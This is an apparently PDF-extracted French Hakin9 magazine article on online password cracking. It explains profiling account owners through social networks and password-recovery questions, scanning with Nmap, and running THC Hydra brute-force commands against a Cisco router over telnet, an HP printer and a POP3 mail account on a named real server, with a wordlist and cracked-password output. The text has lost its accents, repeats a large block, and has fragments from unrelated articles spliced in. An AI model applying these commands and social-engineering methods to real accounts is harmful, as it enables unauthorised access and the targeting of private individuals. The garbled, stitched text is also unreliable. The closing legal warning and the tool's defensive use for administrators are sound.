Je pense qu'analyser tous les paramtres du programme n'a aucun sens. la place, je propose de faire connaissance de plusieurs exemples d'une utilisation pratique de l'Hydre. Pour chacun des exemples prsents, nous sommes partis du principe que la liste de mots de passe potentiels du systme attaqu avait t prpare l'avance et enregistr dans le fichier slownik.txt. Imaginons que notre objectif consiste hacker le mot de passe du routeur Cisco que nous avions identifi auparavant l'aide du scanneur Nmap. Le scan a dmontr que cet outil permettait notamment tablir des connexions sur le

Les concepteurs de cet outil ont opt pour une simplicit de gestion et ils ont mme cr un patch graphique appel HydraGTK. Dans ce cas-l, l'attaque avec une liste de mots de passe prpare auparavant se ramne complter les champs appropris dans plusieurs onglets du programme et de charger la liste de mots de passe probables. En testant le patch graphique, j'ai effectu une attaque sur le service telnet travaillant dans l'imprimante rseau de l'entreprise HP. Sachant que le compte intgr s'appelle dans ce cas-l admin, j'ai commenc l'attaque. L'Hydre a dtermin de nouveau les donnes per-

mettant de se connecter l'imprimante. Il s'est en effet avr que le compte n'avait t protg par aucun mot de passe (Figure 5). Un autre exemple des fonctionnalits exceptionnelles de l'Hydre que je voudrais prsenter en ensemble consiste hacker le compte de la messagerie lectronique disponible via le protocole pop3. Je suppose que l'intrus ne connat que le nom du compte (jan.tajny j'ai cr le compte des fins du test) et le domaine (o2.pl). Il faut ici commencer par dterminer l'adresse IP du serveur de messagerie. Pour ce faire, il suffit de faire la commande ping poczta.o2.pl dans n'importe quel systme d'exploitation. Le rsultat de la commande doit contenir notamment l'adresse qui nous intresse, donc la valeur : 193.17.41.99. L'tape cl suivante consiste gnrer le dictionnaire de mots de passe probables. Imaginons que l'intrus, qui connat les types de mots de passe le plus souvent utilis, a cr un dictionnaire contenant les mots de passe potentiels suivants (en se basant uniquement sur le nom du compte) : jan.tajny, tajny.jan, jan.tajny1, 1jan.tajny, tajny.jan1, 1tajny.jan, jantajny, tajnyjan, jantajny1, 1jantajny, tajnyjan1, 1tajnyjan.

hydra 193.17.41.99 pop3 -s 110 -v

-l jan.tajny -P /slownik.txt -t 1

-f. La signification des commutateurs est

la mme que dans l'exemple prcdent. Cette fois-ci, nous attaquons le protocole pop3, autrement dit, le port 110/TCP. Les nouveauts sont deux : le nombre de tentatives (on peut dire, le nombre des ttes de l'hydre) des connexions simultanes restreint une seule et le commutateur -f, qui force de terminer une opration aprs la premire tentative russie de connexion. L'objectif de tout cela consiste bien videmment viter de bloquer la tentative lorsque nous dpassons les limites mises en place par le serveur distant sur le nombre de tentatives de connexions simultanes et rptes pendant une priode dfinie. Avec le dictionnaire, l'Hydre russira rapidement trouver le mot de passe du compte et en informera avec un message adquat :
[110] [pop3] host: 193.17.41.99 1jan.tajny. login: jan.tajny password:

mots de passe faibles ou potentiellement dangereux, laisss quelque part dans les coins sombres des appareils et des programmes qu'ils administrent.

Conclusion

Avec le dictionnaire de mots de passe potentiels prpar, il suffit de lancer l'Hydre avec les paramtres appropris :

Je n'ai prsent que trois exemples de l'utilisation pratique de l'Hydre. Si nous regardons toutefois la liste imposante de protocoles supports par le programme, il est facile d'imaginer que peuvent faire des intrus ingnieux. Ce programme permet de tester les sites Web protgs par un mot de passe, il supporte les protocoles chiffrs, de messageries et de bases de donnes et ce n'est qu'une partie de ses fonctionnalits. L'Hydre est donc actuellement l'un des outils les plus menaants utiliss par des hackers. Les administrateurs de systmes informatiques pourraient eux aussi apprivoiser l'Hydre car ce programme est un outil prcieux pour dtecter les

Sur le Net
http://nmap.org Nmap, http://www.phenoelit-us.org/dpl/dpl.html Phenoelit's Default Password List, http://www.cirt.net/cgi-bin/passwd.pl CIRT's Default Password List, http://www.virus.org/default-password Default Password Database, http://www.openwall.com/passwords/wordlists/password.lst les mots de passe le plus souvent utiliss http://ophcrack.sourceforge.net Ophcrack, http://freeworld.thc.org The Hacker's Choice Group, http://freeworld.thc.org/thc-hydra THC Hydra.

Pour terminer, je dois vous parler d'une chose importante. Les mthodes prsentes pour trouver les mots de passe aux systmes informatiques distants peuvent tre employes lgalement uniquement pour tester les faiblesses de nos propres systmes ! Obtenir un accs aux systmes informatiques trangers est puni par la prison. Il ne faut donc en aucun cas utiliser les procdures prsentes pour accder aux rseaux et aux ordinateurs qui ne sont pas les ntres. J'espre que j'ai russi attirer l'attention des administrateurs sur la grande menace des mots de passe par dfaut laisss et des mots de passe faciles deviner. Tester les mots de passe par dfaut et profiler les propritaires de comptes pour crer une liste de mots de passe potentiels qu'ils utilisent sont bien videmment des mthodes d'attaques des mots de passe pour les systmes distants. Les attaques consistant couter les transmissions et les mthodes de plus en plus populaires du type man in the middle constituent des exemples d'autres techniques pour cracker les mots de passe online . Mais c'est un sujet pour un article part. Il ne faut donc jamais oublier que les criminels informatiques connaissent les faiblesses humaines et en profiteront sans aucun tat d'me. De plus, il s'agit souvent de spcialistes qualifis dans le domaine des protections techniques d'informations. Paradoxalement les outils qu'ils emploient, tels que THC Hydra, peuvent servir aux administrateurs pour se protger contre les intrus car ils permettent de tester soi-mme les faiblesses des systmes administrs.

Karmic Koala VS Snow Leopard Cada vez que aparece una nueva versin de Ubuntu, es decir cada seis meses, algunos sitios y revistas especializadas
6/2009 HAKIN9 59

Prosz powiedzie,

Degr de difficult

ATTAQUE Hacker les mots de passe

Figura 1. Seleccin de modo de arranque

I
Cet artiCle explique...
Les attaques permettant de hacker des mots de passe pour les services distance, Les outils qui servent cracker les mots de passe online, Les mthodes de profiling des propritaires des comptes protgs par un mot de passe, Les mthodes pour trouver des informations personnelles sur des inconnus, Les principes de crer des mots de passe scuriss.

Ce qu'il faut savoir...

Connatre les notions de l'ingnierie sociale, Connatre les notions des mthodes pour faire des attaques simples sur le rseau, Connatre les notions du fonctionnement et de l'utilisation des outils qui servent analyser le rseau et les systmes informatiques, tels que Nmap, Connatre les notions du fonctionnement du protocole Telnet. 50 HAKIN9 6/2009

l existe de nombreuses mthodes diffrentes pour cracker des mots de passe. Afin de choisir une mthode approprie, il faut reposer sur une analyse de la tche concrte. Nous distinguons deux types d'attaque de base relatifs aux mots de passe. Les attaques du type offline se servent du fait d'avoir un accs direct au fichier chiffr (par exemple, les archives RAR, ZIP, etc. chiffrs) ou au fichier contenant les mots de passe chiffrs (par exemple, le fichier /etc/shadow dans les systmes d'exploitation du type *NIX). Bien que rcuprer les mots de passe directement sous forme chiffre, donc retourner un algorithme qui gnre les mots de passe cods, peut tre difficile, voire impossible. Possder les mots de passe sous cette forme ouvre la voie plusieurs mthodes de l'attaque. Rcuprer un mot de passe cod permet de dfinir un groupe de mots de passe probables, de gnrer leurs codes conformment l'algorithme utilis dans ce cas-l et ensuite de comparer tous les mots de passe cods au mot de passe crack. Si le mot de passe cod est identique un de mots de passe cods dans l'ensemble vrifi, nous avons russi : nous avons trouv le mot de passe recherch. La plupart d'algorithmes utiliss actuellement pour gnrer un mot de passe cod sont trs rapides, grce quoi il est possible en une seconde de gnrer des centaines de milliers de mots de passe cods

et de les comparer un modle. Toute une gamme d'attaques a t base sur ce principe : notamment les attaques par dictionnaire, les attaques qui vrifient toutes les combinaisons de mots de passe possibles (algorithmes de force) et les mthodes hybrides. Les attaques bases sur les tableaux arc-en-ciel constituent une russite rcente dans le domaine de crackage de mots de passe offline. L'ide est assez simple : cette mthode repose sur la gnration d'une base contenant les couples
<mots de passe, mot de passe cod>

pour l'ensemble de mots de passe prvu. Les mthodes spciales permettent d'enregistrer seulement certains mots de passe cods. Grce cette dmarche, la base entire garde une taille raisonnable. Dans un tel cas, deviner un mot de passe dont le code est en notre possession, consiste trouver dans la base le code identique et lire le mot de passe qui lui correspond. Ces mthodes sont trs efficaces et trs rapides. Il est possible en quelques secondes de cracker un mot de passe. Les mthodes traditionnelles de vrification de toutes les combinaisons possibles auraient besoin des jours, des mois, voire des annes pour le faire. Les attaques du type offline ont t prsentes en dtails dans notre magazine Hakin9 (numro 1/2009) par ukasz Ciesielski. Je voudrais parler en revanche dans cet article des attaques du type online. Les attaques de

ce type peuvent tre dfinies comme celles o la seule possibilit de vrifier si le mot de passe est correct consiste tenter de se connecter au systme attaqu. Les exemples de ces attaques : tentative d'attaquer un serveur FTP distant ou tentative d'obtenir le mot de passe une bote e-mail disponible via l'interface Web. Dans ce type d'attaques, le processus de cracker le mot de passe est trs complexe. Il en est ainsi car les situations o nous utilisons des mthodes du type online se caractrisent pas l'absence d'accs au mot de passe attaqu sous forme cod. Il est donc impossible d'opter pour les attaques par dictionnaire, de force, hybrides et pour celles qui reposent sur la base de mots de passe cods gnres auparavant. Comment donc cracker un mot de passe lorsque nous ne disposons d'aucune donne sur son sujet et nous ne pouvons pas accder au systme o ce mot de passe est stock ? Il existe des mthodes, aussi bien techniques que non, dont l'utilisation simultane permettra de cracker des mots de passe et leur efficacit peut tre surprenante.

Magie noire ?

Comme je l'ai dj mentionn, les attaques du type online se caractrisent par l'absence d'accs au mot de passe chiffr. Cette situation rend impossible l'utilisation de la plupart de mthodes traditionnelles pour cracker des mots de passe car elles se basent sur la gnration et la comparaison des mots de passe cods. Ce n'est pas toutefois le seul problme qui se trouve devant un intrus. Comme le contact avec le systme d'exploitation ou le service attaqu n'est possible que par l'intermdiaire d'un rseau (sous forme d'une tentative de connexion), vrifier une seule combinaison de mot de passe dure beaucoup plus longtemps qu'une opration similaire effectue en local. Cela signifie donc que dans le cas d'attaques online, l'intrus est en gnral incapable de tester des millions ou des milliers de combinaisons de mots de passe. De plus, les milliers de tentatives de connexion envoyes au

serveur par un rseau public peuvent attirer l'attention des systmes rseau chargs de dtecter des attaques NIDS (en anglais Network Intrusion Detection System) qui remarqueront la tentative d'attaque. Il arrive aussi souvent que les administrateurs dfinissent un nombre maximal de tentatives de connexion un serveur ou service donn dans un intervalle dfini, ce qui rend galement impossible les tentatives massives de connexion distance. Les attaques du type online constituent pour un intrus un grand dfi mais elles ne sont pas impossibles raliser. Un cracker peut dans un tel cas opter pour une mthode que nous pouvons appeler une mthode par dictionnaire modifie avec l'utilisation des outils d'automatisation de la connexion distance. L'ide est assez simple et consiste gnrer un petit dictionnaire contenant seulement les mots de passe dont nous pensons qu'ils peuvent tre utiliss dans le cas concret. Munis d'un dictionnaire ainsi prpar, nous utilisons ensuite les outils qui tenteront une connexion automatique au serveur ou service attaqu pour tous les mots tests. Au moment o l'une de tentatives russit, le programme affichera le mot de passe correct pour le systme attaqu. Comme vous pouvez le constater, la partie la plus difficile de cette opration consiste gnrer ce dictionnaire magique de mots de passe potentiels. Au premier abord, la tche semble pratiquement impossible faire car

sur quoi nous baser pour deviner un mot de passe ? Je vous dmontrerai dans un instant que cette tche peut s'avrer tonnamment simple. Les connaissances strictement informatiques ne seront pas ici utiles. Il faut utiliser les statistiques, la psychologie appliques et l'ingnierie sociale. Le plus grand alli de l'intrus est tout simplement la paresse et la ngligence humaines...

Cracker la bote noire

Lorsque nous n'avons aucune connaissance sur le serveur, le service ou le dispositif rseau (je parle ici galement de connaissances sur les administrateurs) dont le mot de passe nous voulons avoir, nous parlons du crackage de la bote noire (en anglais black box cracking). Il semble que crer un dictionnaire de mots de passe potentiels qui servirait aux tests suivants soit impossible dans une telle situation. Remarquez toutefois que les serveurs d'aujourd'hui travaillent sous contrle d'un des plusieurs systmes d'exploitation couramment utiliss. Les applications Web utilisent gnralement plusieurs moteurs les plus populaires. Les services sont proposs au moyen de plusieurs solutions populaires, commerciales ou gratuites. Enfin, les dispositifs rseau spcialiss, tels que les commutateurs ou les routeurs, proviennent en grande partie de plusieurs fabricants leaders. La conclusion : l'intrus rencontrera le plus probablement un environnement typique, il arrive rarement qu'une solution donne

6/2009 HAKIN9

51

ATTAQUE
soit cre depuis les bases la commande. Ensuite, nous pouvons remarquer que probablement toutes ces solutions (application Web, routeur, serveur de base de donnes, etc.) proposeront une interface permettant une gestion distance. Il peut s'agir d'une interface disponible via le navigateur Internet, via une ligne de commandes, le protocole SNMP, etc. Ceci n'a pas d'importance. La chose la plus importante est que l'intrus est capable d'identifier une telle cible. Au moyen des techniques connues comme OS and Service Fingerprinting, nous sommes capables de recueillir une srie d'informations sur la cible de l'attaque. La description dtaille des techniques d'empreinte digitale dpasse les cadres de cet article, je mentionnerai donc seulement que le scanneur rseau Nmap peut tre trs utile ici. Lorsque nous disposons des informations lmentaires sur le type du systme d'exploitation, du dispositif ou du service, nous pouvons passer la cration de la liste de mots de passe potentiels. Dans le cas de la bote noire, la liste de mots de passe potentiels doit contenir dans un premier temps les mots de passe par dfaut rencontrs dans la solution en question. Il arrive trs souvent que les dispositifs ou les services ne soient pas correctement protgs. Les administrateurs laissent les comptes par dfaut avec des mots de passe par dfaut et les utilisent. Il peut galement arriver que les administrateurs aient cr des comptes protgs par des mots de passe puissants et ils les utilisent pendant le travail mais ils ont oubli de dsactiver les comptes intgrs par dfaut. Il arrive aussi qu'un compte test (par exemple, test) ait t cr pour mettre en place et tester un nouveau service protg par un mot de passe facile retenir (par exemple, test aussi). Nous pouvons rencontrer des situations dans lesquelles un mot de passe vide est utilis pendant les tests ! Ce choix doit bien videmment faciliter les connexions frquentes durant les tests du service. Il arrive malheureusement souvent qu'une fois le lancement final effectu, les administrateurs oublient de supprimer un tel compte. Contrairement de nombreux administrateurs, les hackers et les crackers connaissent trs bien le problme de mots de passe par dfaut ou utiliss dans les tests et ils profitent souvent de cette faille. Les groupes de hackers et de crackers crent mme des listes spciales de mots de passe o tout le monde peut trouver des mots de passe par dfaut pour un appareil ou un programme donn. Le groupe connu sous le nom de Phenoelit a cr et actualise sans cesse une des plus grandes listes de ce type. En utilisant cette liste, les administrateurs peuvent vrifier si les mots de passe par dfaut aux services et dispositifs dans leurs rseaux ne sont pas actifs. Malheureusement, les crackers peuvent aussi (et ils le font) utiliser cette base de mots de passe... Dans un second temps, il faut prendre en considration les mots de passe susmentionns employs lors des testes et les mots de passe utiliss le plus souvent. Si les mots de passe par dfaut n'ont pas permis de se connecter un service distant, le cracker peut encore vrifier les mots de passe utiliss le plus souvent. Les statistiques relatives aux mots de passe utiliss, dmontrent clairement que les gens choisissent en gnral des mots de passe simples, faciles retenir et qui se rfrent quelque chose qu'ils connaissent. Les listes de mots de passe le plus souvent utiliss sont bien videmment aussi publies sur Internet. l'instar des mots de passe par dfaut, ils peuvent tre utiliss pour vrifier si le mot de passe que nous utilisons se trouve sur l'une de ces listes. Ces listes sont toutefois utilises le plus probablement par des intrus pour crer des listes de mots de passe potentiels. Les mots de passe considrs le plus souvent comme le plus utiliss sont les suivants : mot de passe vide (absence de mot de passe), mot mot de passe ou password , mot admin ou administrateur , suite de caractres avoisinants sur le clavier par exemple azerty ou qsdf , mot de passe identique au nom du compte (login), injure. La plupart d'administrateurs se rendent compte du fait qu'il ne faut pas utiliser
52 HAKIN9 6/2009

les mots de passe employs le plus souvent et donc ils en choisissent un... et ils le modifient. Ils ajoutent le plus souvent un chiffre la fin ou au dbut du mot de passe. Il s'agit le plus frquemment d'un chiffre 1. Les crackers le savent bien videmment et ils ajouteront la liste de mots de passe probables les combinaisons comme : admin1, password1, ou bien 1asdf. Analysons un exemple de voler un mot de passe : une tentative de hacker un mot de passe pour un systme travaillant sur une adresse IP concrte. Mis part l'adresse IP, nous ne savons rien sur la cible de l'attaque, il s'agit donc du cas de crackage de la bote noire. Munis uniquement de l'adresse IP, nous pouvons dans un premier temps essayer d'identifier le type du systme qui fonctionne l'adresse distante. Pour ce faire, il suffit de lancer le scanneur Nmap avec les paramtres suivants : nmap -A adresse_ IP_de_la_cible. Regardez le rsultat du scan (Figure 1). Vous remarquerez que Nmap a identifi le systme distant comme un routeur travaillant sous le contrle du systme d'exploitation IOS. Vous verrez aussi que l'adresse scanne supporte la liaison du type DSL dans le domaine tpnet.pl. Sous l'adresse IP choisie se cache donc le routeur de l'entreprise Cisco derrire lequel se trouve le plus probablement le rseau LAN de l'entreprise. Analysons la suite des rsultats du scan : nous remarquerons les ports ouverts de l'appareil, en particulier 23/TCP et 80/TCP. Les services telnet et les gestions ouverts tous par le serveur Web intgr sont la preuve que l'appareil n'a pas t correctement protg. Nous pouvons donc essayer de nous connecter l'appareil via les interfaces ouvertes en utilisant les mots de passe par dfaut (les donnes par dfaut permettant de nous connecter au routeur Cisco, c'est en gnral : cisco:cisco) ou les mots de passe le plus frquemment employs. Si nous sommes chanceux, nous russirons obtenir un accs complet l'appareil.

Cracker la bote grise

Si nous n'avons aucune donne sur le systme attaqu, les mthodes prsentes ne sont pas bien videmment

Figure 3. Activation du crash dump

6/2009 HAKIN9 53

ATTAQUE
efficaces 100 % et le succs dpendra d'une faiblesse ventuelle du mot de passe ou de la ngligence de l'administrateur. Cependant, l'intrus dispose trs souvent d'un savoir partiel sur le service attaqu ou son administrateur/ propritaire. Il en est ainsi car en gnral, il choisit une cible concrte de l'attaque et le choix n'est pas alatoire. Lorsque nous disposons d'un savoir, aussi minime soit il, sur le systme attaqu et les personnes y lies, nous parlons d'une attaque consistant cracker une bote grise (en anglais gray box cracking). En crant un dictionnaire de mots de passe potentiels au systme dont nous connaissons quelque chose, nous testerons dans un premier temps les possibilits prsentes dan le cas d'une bote noire. Si les mots de passe par dfaut et le plus souvent employs ne permettent pas de nous connecter au service attaqu, il faut alors nous servir du savoir relatif au systme lui-mme et aux personnes qui le grent. Si le savoir concerne le systme, le service, le serveur, le logiciel ou l'appareil dont le mot de passe nous voulons voler, nous pouvons utiliser ce savoir de manire suivante en crant le dictionnaire de mots de passe potentiels : sachant que l'application cre la commande s'appelle par exemple GigaWebAdmin, nous pouvons ajouter au dictionnaire de mots de passe probables les logins et les mots de passe suivants : gigawebadmin:gigawebadmin, admin:gigawebadmin, administrator: gigawebadmin, etc. ; il est galement conseill de tester les mots de passe contenant un chiffre au dbut et la fin, tels que gigawebadmin1 et 1gigawebadmin, si le systme, dont le mot de passe nous voulons voler, propose une interface Web permettant d'enregistrer un nouvel utilisateur, il est conseill de faire sa connaissance : elle pourra tre une source d'informations prcieuses relatives aux exigences et aux limites des mots de passe. Grce cette information, nous pouvons par exemple apprendre que les mots de passe des utilisateurs du systme doivent contenir au moins un chiffre. Nous pourrons donc ensuite modifier le dictionnaire de mots de passe probables de sorte que toutes les entres contiennent un chiffre au dbut ou la fin (c'est la manire la plus probable utilise par les utilisateurs pour remplir les exigences du systme), si nous avons des informations sur l'entreprise qui implmente le systme donn, elles peuvent aussi tre d'une grande aide. Si l'entreprise s'appelle par exemple Giga Web Soft, l'intrus peut ajouter au dictionnaire les logins et les mots de passe suivants : gigawebsoft:gigawebsoft, gigawebsoft:gigawebsoft1, gws:gws, gws:gws1, etc. ; il est fort probable que les dveloppeurs ont cr pour euxmmes un compte d'administrateur protg par un mot de passe simple retenir pour la dure de la mise en place. Les administrateurs peuvent en revanche oublier de dsactiver ou de supprimer un tel compte. compte, nous pouvons ajouter des suites de caractres lis son prnom ou nom ou sa date de naissance la liste de mots de passe probables. Si nous avons des informations sur les personnes proches du propritaire du compte, nous pouvons vrifier les mots de passe lis aux donnes personnelles de l'pouse/l'poux, d'un(e) ami(e), etc. certains utilisateurs savent que les donnes personnelles de leurs proches peuvent tre trop faciles deviner, ils choisissent donc pour leur mot de passe une suite de caractres lis aux faits connus pour un nombre restreint de personnes, par exemple, les prnoms des animaux domestiques, le nom de l'endroit prfr ou le prnom du premier amour de la priode de l'cole lmentaire.

Si nous avons des informations sur la personne dont le mot de passe au service donn nous voulons hacker, la situation est plus intressante. En crant un dictionnaire de mots de passe potentiels, nous pouvons alors essayer de nous servir des faits suivants : si nous connaissons les donnes personnelles du propritaire du

Bien videmment, il est conseill de tester mme ces combinaisons avec un chiffre au dbut et la fin car c'est toujours la manire la plus frquente de diversifier les mots de passe. Il arrive souvent toutefois que l'intrus ne connat pas bien la personne dont le compte il veut visiter. Il est possible d'avoir le prnom et le nom de l'administrateur du systme informatique donn, du serveur ou de l'appareil rseau (nous pouvons parfois trouver ces informations sur le site Web de l'entreprise en question !) mais de n'avoir aucune autre donne personnelle ni aucune information lie la vie prive de cette personne. Il existe toutefois des mthodes permettant de faire connaissance des personnes compltement inconnues...

un (in)connu

Abbildung 6. Ein dezentral organisiertes Netzwerk (TCP/IP).

54 HAKIN9 6/2009

Imaginons que nous avons russi trouver le prnom et le nom du propritaire du compte dont le mot de passe nous cherchons. Comment crer un dictionnaire de mots de passe potentiels, contenant les mots de passe par dfaut et le plus souvent employs ainsi que les suites avec des donnes personnelles de cette personne et de ses amis ? Il suffit de visiter les rseautages sociales (en

anglais social network services), telles que Copains d'avant. Les portails de ce type permettent de rencontrer des contacts intressants, de connatre des nouvelles personnes et de renouveler des connaissances d'avant. Malheureusement, pour que les autres puissent nous retrouver, nous sommes obligs de partager de nombreuses informations notre sujet. Si nous ne connaissons que le prnom et le nom du propritaire du compte attaqu et supposons qu'il fait partie des portails sociaux, nous pouvons recueillir une srie de mots de passe potentiels. Premirement, si la recherche retourne de nombreux utilisateurs avec le mme prnom et nom, il faut dterminer de quel profil il s'agit. Nous pouvons nous focaliser alors sur le lieu de domicile (prs de l'entreprise o la personne travaille) et la description de ce qu'elle fait comme travail. Si nous identifions le compte appropri sur le portail, nous pouvons recueillir de nombreux mots de passe potentiels d'aprs l'analyse du profil et de ses connaissances. titre d'exemple, les mots de passe potentiels ainsi dfinis peuvent tre les suivants : pseudo de l'cole, nom de jeune fille (il arrive que les femmes maries utilisent leur nom de jeune fille en tant que mot de passe pensant que peu de gens le connaissent dans leur nouvel environnement), numro de tlphone, prnom de l'animal domestique prfr (si quelqu'un a un animal domestique, il a peut-tre publi sa photo avec son prnom), nom du lieu prfr (nous parcourons la galerie de photos la recherche des photos avec une description adquate), donnes personnelles du meilleur ami ou d'une copine de l'enfance (nous parcourons la galerie de photos sentimentales avec des commentaires), numro de la plaque d'immatriculation (ou marque/modle) de la voiture, de la moto, etc. (il arrive que les utilisateurs publient dans les galeries les photos des vhicules qu'ils possdent),

donnes personnelles des proches (poux/pouse, frres et soeurs, enfants) et des amis.

Afin de dterminer lesquels de contacts de la personne en question appartiennent ses proches, il suffit en gnral d'analyser la galerie de photos et leurs descriptions et commentaires ajouts au profil et photos par d'autres utilisateurs du portail. Lorsque nous avons dtermin le groupe de personnes proches, nous pouvons ajouter toutes les catgories de donnes susmentionnes (dtermines respectivement pour chaque personne) la liste de mots de passe probables. Comme d'habitude, une bonne ide consiste ajouter des combinaisons contenant un chiffre au dbut et la fin de la suite, il est galement conseill d'ajouter des combinaisons crites l'envers. Tout dpend bien videmment quel degr notre dictionnaire de mots de passe probables doit tre restreint (par exemple, en raison des limites appliques sur le systme donn concernant le nombre de connexions pendant une priode dfinie). Si nous disposons d'autres donnes

relatives au propritaire du compte, il est possible aussi d'utiliser d'autres techniques pour recueillir des informations sur les mots de passe probables. Si par exemple nous connaissons l'adresse e-mail prive du propritaire du compte attaqu, ouvert sur un serveur public, nous pouvons profiter de cette information. Il suffit d'utiliser le formulaire qui sert rcuprer un mot de passe oubli de la bote e-mail. Si la question permettant de rcuprer le mot de passe est assez simple (par exemple, le prnom de mon chien, le prnom de mon premier amour), nous pourrons peut-tre rcuprer le mot de passe de la bote car nous avons le plus probablement trouv les rponses ces questions sur le portail social. Si nous sommes chanceux, le mot de passe du compte attaqu sera identique ou trs similaire au mot de passe rcupr dans la bote de messages lectroniques. Ce n'est pas un secret que de nombreuses personnes utilisent toujours les mmes mots de passe (ou trs similaires). Mme si le mot de passe du compte cible est diffrent, nous pouvons au moins avoir l'ide de mots de passe que la personne

6/2009 HAKIN9

55

ATTAQUE

56 HAKIN9 6/2009

6/2009 HAKIN9

57

ATTAQUE
utilise. Si nous russirons accder (par exemple, distance) l'ordinateur utilis par la personne en question, rcuprer les informations sur les mots de passe employs est encore plus simple. Il suffit que l'intrus cracke le mot de passe du compte de cette personne dans le systme Windows au moyen de la distribution Linux prvue cet effet : Ophcrack. Il est galement possible de dcouvrir les mots de passe employs dans les messageries instantanes. Tous ces points faciliteront bien videmment l'intrus de dfinir de manire prcise les mots de passe potentiels lors de l'attaque du compte cible de l'utilisateur. Afin de connatre les exemples de mots de passe employs par la personne analyse, l'intrus peut se servir des mthodes sociotechniques avances. titre d'exemple, s'il connat les centres d'intrt de la personne attaque (le portail social est de nouveau trs utile), il peut lui envoyer une invitation pour ouvrir un profil dans un forum thmatique spcialement prpar. Cette dmarche permettra d'apprendre quel type de mot de passe la personne utilise. Comme vous pouvez le constater, un intrus ingnieux dispose de toute une gamme de possibilits pour dterminer une liste de mots de passe potentiels employs par la victime. Pour conclure la procdure d'attaque du type online que je propose, j'ai cr un schma selon lequel l'intrus peut procder l'attaque (Figure 3). Les exemples prsents ne constituent que quelques ides, les possibilits dans ce cadre sont quasiment illimites. Aprs un processus fatigant pour crer un tel dictionnaire, il ne nous reste qu' tester son efficacit. cela, vrifier la main toutes les possibilits via la mthode de la tentative manuelle de connexion au service distant n'a aucun sens. Dans les cas extrmes, le processus durerait trop longtemps et il est possible de faire des erreurs en saisissant les mots de passe la main. Par consquent, la tentative serait peu crdible et prendrait beaucoup de temps. cette tape, il faut donc opter pour un outil permettant d'effectuer des tentatives automatiques de connexion des systmes et services diffrents selon la liste de mots de passe donne. Il s'avre qu'un outil parfait pour ce faire a t cr par un groupe allemand de hackers agissant sous le nom de THC (en anglais The Hacker's Choice). THC Hydra est un programme permettant de tester assez rapidement les mots de passe de nombreux services diffrents. Cet outil supporte plusieurs dizaines de protocoles dont les plus importants sont : telnet, ftp, http, https, smb, ms-sql, mysql, rsh, snmp, vnc, pop3, imap, Cisco auth, Cisco enable, Cisco AAA. 23 port TCP, donc il permettait une gestion texte via le protocole telnet. Afin de faire une tentative de hacker le mot de passe au compte par dfaut appel cisco, il suffit de lancer l'Hydre avec les paramtres suivants : hydra adres_IP_celu telnet -s 23 -v -l cisco -P /slownik.txt -e ns -t 36 (Figure 4). Le fichier de mots de passe potentiels utiliss dans ce cas-l contenait les mots de passe par dfaut rencontrs dans le cas des appareils Cisco et plusieurs mots de passe employs le plus souvent. Au bout de quelques secondes, l'Hydre a termin son travail en affichant le mot de passe trouv pour le compte cisco. Dans ce cas, l'administrateur n'a pas supprim le compte par dfaut et n'a pas modifi le mot de passe y li, ce qui a permis de dterminer l'intrus les donnes permettant se connecter au systme. Comme vous pouvez le constater, il n'est pas difficile de grer le programme Hydre. La signification de tous les paramtres d'appel est la suivante : telnet type du service pour lequel nous voulons tester les mots de passe, -s 23 numro du port, -l cisco login pour lequel nous voulons tester les mots de passe, -p /slownik.txt mots de passe ou fichier avec une liste de mots de passe que nous voulons tester, -e ns activation du test des mots de passe vides ou identiques avec le login, -t 36 nombre de connexions simultanes au service attaqu.

Hydre fouinard

Munis du dictionnaire de mots de passe potentiels cr auparavant pour le systme ou le service cracker, il ne nous reste qu' passer l'attaque proprement parler. Dans le cas d'attaques du type online, le dictionnaire prpar peut contenir de plusieurs centaines jusqu' plusieurs milliers d'entres. Crer des dictionnaires plus grands n'a pas en gnral de sens en raison des limites susmentionnes prsentes dans ce type d'attaques. Malgr
58 HAKIN9 6/2009

Je pense qu'analyser tous les paramtres du programme n'a aucun sens. la place, je propose de faire connaissance de plusieurs exemples d'une utilisation pratique de l'Hydre. Pour chacun des exemples prsents, nous sommes partis du principe que la liste de mots de passe potentiels du systme attaqu avait t prpare l'avance et enregistr dans le fichier slownik.txt. Imaginons que notre objectif consiste hacker le mot de passe du routeur Cisco que nous avions identifi auparavant l'aide du scanneur Nmap. Le scan a dmontr que cet outil permettait notamment tablir des connexions sur le

Les concepteurs de cet outil ont opt pour une simplicit de gestion et ils ont mme cr un patch graphique appel HydraGTK. Dans ce cas-l, l'attaque avec une liste de mots de passe prpare auparavant se ramne complter les champs appropris dans plusieurs onglets du programme et de charger la liste de mots de passe probables. En testant le patch graphique, j'ai effectu une attaque sur le service telnet travaillant dans l'imprimante rseau de l'entreprise HP. Sachant que le compte intgr s'appelle dans ce cas-l admin, j'ai commenc l'attaque. L'Hydre a dtermin de nouveau les donnes per-

mettant de se connecter l'imprimante. Il s'est en effet avr que le compte n'avait t protg par aucun mot de passe (Figure 5). Un autre exemple des fonctionnalits exceptionnelles de l'Hydre que je voudrais prsenter en ensemble consiste hacker le compte de la messagerie lectronique disponible via le protocole pop3. Je suppose que l'intrus ne connat que le nom du compte (jan.tajny j'ai cr le compte des fins du test) et le domaine (o2.pl). Il faut ici commencer par dterminer l'adresse IP du serveur de messagerie. Pour ce faire, il suffit de faire la commande ping poczta.o2.pl dans n'importe quel systme d'exploitation. Le rsultat de la commande doit contenir notamment l'adresse qui nous intresse, donc la valeur : 193.17.41.99. L'tape cl suivante consiste gnrer le dictionnaire de mots de passe probables. Imaginons que l'intrus, qui connat les types de mots de passe le plus souvent utilis, a cr un dictionnaire contenant les mots de passe potentiels suivants (en se basant uniquement sur le nom du compte) : jan.tajny, tajny.jan, jan.tajny1, 1jan.tajny, tajny.jan1, 1tajny.jan, jantajny, tajnyjan, jantajny1, 1jantajny, tajnyjan1, 1tajnyjan.

hydra 193.17.41.99 pop3 -s 110 -v

-l jan.tajny -P /slownik.txt -t 1

-f. La signification des commutateurs est

la mme que dans l'exemple prcdent. Cette fois-ci, nous attaquons le protocole pop3, autrement dit, le port 110/TCP. Les nouveauts sont deux : le nombre de tentatives (on peut dire, le nombre des ttes de l'hydre) des connexions simultanes restreint une seule et le commutateur -f, qui force de terminer une opration aprs la premire tentative russie de connexion. L'objectif de tout cela consiste bien videmment viter de bloquer la tentative lorsque nous dpassons les limites mises en place par le serveur distant sur le nombre de tentatives de connexions simultanes et rptes pendant une priode dfinie. Avec le dictionnaire, l'Hydre russira rapidement trouver le mot de passe du compte et en informera avec un message adquat :
[110] [pop3] host: 193.17.41.99 1jan.tajny. login: jan.tajny password:

mots de passe faibles ou potentiellement dangereux, laisss quelque part dans les coins sombres des appareils et des programmes qu'ils administrent.

